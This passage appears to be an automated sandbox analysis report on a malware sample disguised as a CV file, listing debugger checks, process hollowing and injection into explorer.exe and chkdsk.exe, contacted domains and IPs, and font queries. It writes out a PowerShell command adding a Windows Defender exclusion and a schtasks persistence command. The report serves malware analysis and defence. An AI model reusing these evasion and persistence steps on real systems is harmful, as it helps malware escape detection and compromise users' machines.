Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h] 8_2_01257E41
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h] 8_2_01257E41
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h] 8_2_01257E41
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h] 8_2_01257E41
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h] 8_2_01257E41
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01257E41 mov eax, dword ptr fs:[00000030h] 8_2_01257E41
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0130EA55 mov eax, dword ptr fs:[00000030h] 8_2_0130EA55
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0130AE44 mov eax, dword ptr fs:[00000030h] 8_2_0130AE44
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0130AE44 mov eax, dword ptr fs:[00000030h] 8_2_0130AE44
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012D4257 mov eax, dword ptr fs:[00000030h] 8_2_012D4257
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h] 8_2_012452A5
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h] 8_2_012452A5
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h] 8_2_012452A5
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h] 8_2_012452A5
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012452A5 mov eax, dword ptr fs:[00000030h] 8_2_012452A5
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012C46A7 mov eax, dword ptr fs:[00000030h] 8_2_012C46A7
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01310EA5 mov eax, dword ptr fs:[00000030h] 8_2_01310EA5
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01310EA5 mov eax, dword ptr fs:[00000030h] 8_2_01310EA5
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01310EA5 mov eax, dword ptr fs:[00000030h] 8_2_01310EA5
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125AAB0 mov eax, dword ptr fs:[00000030h] 8_2_0125AAB0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125AAB0 mov eax, dword ptr fs:[00000030h] 8_2_0125AAB0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127FAB0 mov eax, dword ptr fs:[00000030h] 8_2_0127FAB0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012DFE87 mov eax, dword ptr fs:[00000030h] 8_2_012DFE87
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127D294 mov eax, dword ptr fs:[00000030h] 8_2_0127D294
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127D294 mov eax, dword ptr fs:[00000030h] 8_2_0127D294
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01272AE4 mov eax, dword ptr fs:[00000030h] 8_2_01272AE4
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012716E0 mov ecx, dword ptr fs:[00000030h] 8_2_012716E0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012576E2 mov eax, dword ptr fs:[00000030h] 8_2_012576E2
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01318ED6 mov eax, dword ptr fs:[00000030h] 8_2_01318ED6
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012736CC mov eax, dword ptr fs:[00000030h] 8_2_012736CC
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01272ACB mov eax, dword ptr fs:[00000030h] 8_2_01272ACB
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012FFEC0 mov eax, dword ptr fs:[00000030h] 8_2_012FFEC0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01288EC7 mov eax, dword ptr fs:[00000030h] 8_2_01288EC7
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\CV.bat.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289910 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_01289910
Source: C:\Users\user\Desktop\CV.bat.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.hipnoterapia.store
Source: C:\Windows\explorer.exe Network Connect: 91.195.240.94 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 63.141.242.46 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.yaignars.site
Source: C:\Windows\explorer.exe Domain query: www.miarizzuto.org
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\CV.bat.exe Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 1200000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\CV.bat.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\CV.bat.exe Memory written: C:\Users\user\Desktop\CV.bat.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\CV.bat.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\CV.bat.exe Thread register set: target process: 3452 Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Thread register set: target process: 3452 Jump to behavior
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\CV.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe
Source: C:\Users\user\Desktop\CV.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\CV.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process created: C:\Users\user\Desktop\CV.bat.exe C:\Users\user\Desktop\CV.bat.exe Jump to behavior
Source: explorer.exe, 0000000D.00000000.306683345.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.357832693.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.389587124.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: explorer.exe, 0000000D.00000000.306683345.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.371469343.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.357832693.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000D.00000000.306683345.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.357832693.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.389587124.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000D.00000000.357133629.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.388287354.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.305607182.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 0000000D.00000000.306683345.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.357832693.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.389587124.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Users\user\Desktop\CV.bat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
